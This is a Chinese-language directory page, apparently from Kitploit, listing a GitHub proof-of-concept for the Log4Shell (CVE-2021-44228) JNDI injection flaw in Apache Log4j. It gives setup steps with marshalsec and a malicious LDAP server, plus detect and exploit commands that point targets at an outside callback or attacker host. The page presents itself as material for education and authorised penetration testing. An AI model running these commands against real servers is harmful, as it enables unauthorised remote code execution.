Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Log4Shell — Log4Shell CVE-2021-44228 PoC | Kitploit
工具/GitHubGitHub/moften/log4shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmoften/log4shell

Log4Shell

Log4Shell CVE-2021-44228 PoC

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4Shell

(CVE-2021-44228)

☠️ Log4Shell PoC (CVE-2021-44228)

针对 Apache Log4j ≤ 2.14.1 中关键漏洞 Log4Shell 的测试利用工具,可通过 JNDI 注入实现远程代码执行。

⚠️ 此 PoC 仅用于教育目的和在授权环境中的受控测试。 未经明确许可,请勿将其用于任何系统。


要求

  • Python 3.x
  • Java 8 或更高版本
  • marshalsec(用于恶意 LDAP 服务器)
  • HTTP 服务器(例如 python3 -m http.server)
  • Docker(可选,用于搭建漏洞环境)

本地测试环境(可选,使用 Docker)

  1. 运行存在漏洞的应用:

    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    
  2. 访问:http://localhost:8080

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

使用方法

被动检测模式:

python3 main.py -u http://target.com -i burp.collab.net -m detect

主动利用模式(需要在 HTTP 服务器上放置 Exploit.class):

python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit
下载工具